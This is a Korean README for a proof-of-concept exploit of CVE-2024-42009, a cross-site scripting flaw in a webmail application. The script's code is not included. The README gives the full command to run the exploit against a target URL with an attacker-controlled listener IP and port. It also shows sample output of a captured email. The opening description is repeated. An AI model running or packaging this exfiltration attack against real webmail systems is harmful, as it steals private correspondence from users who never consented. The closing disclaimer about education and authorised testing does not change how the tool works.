
이 PoC(Proof of Concept)는 CVE-2024-42009에 대한 익스플로잇을 시연하며, XSS(교차 사이트 스크립팅) 취약점을 활용하여 대상 웹메일 애플리케이션에서 이메일을 추출합니다. 이 공격은 공격자가 제어하는 리스너로 이메일 콘텐츠를 유출하는 악성 페이로드를 주입합니다.
이 개념 증명(PoC)은 CVE-2024-42009에 대한 익스플로잇을 시연하며, 교차 사이트 스크립팅(XSS) 취약점을 활용하여 대상 웹메일 애플리케이션에서 이메일을 추출합니다. 공격은 악성 페이로드를 주입하여 이메일 콘텐츠를 공격자가 제어하는 리스너로 유출합니다.
pip install requests beautifulsoup4
필요한 인수와 함께 스크립트를 실행합니다:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
| 인수 | 설명 |
|---|---|
-fu, --from-user | 발신자의 이메일 주소 |
-tu, --to-user | 수신자의 이메일 주소 |
-u, --target-url | 대상 웹메일 URL |
-ip, --server-ip | 공격자 리스너 IP 주소 |
-p, --server-port | 리스너 포트 (기본값: 1337) |
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
본 저장소에 호스팅된 취약점 및 모든 관련 익스플로잇에 대한 크레딧/소유권/공개를 주장하지 않습니다 - 모든 크레딧은 이를 발견한 연구자에게 있습니다; 저는 인터넷 데이터를 기반으로 취약점을 재현하기 위한 POC를 만들었을 뿐입니다. 이 PoC는 교육 및 연구 목적으로만 사용됩니다. 동의 없이 시스템에 대한 무단 테스트는 불법입니다. 책임감 있게 사용하세요!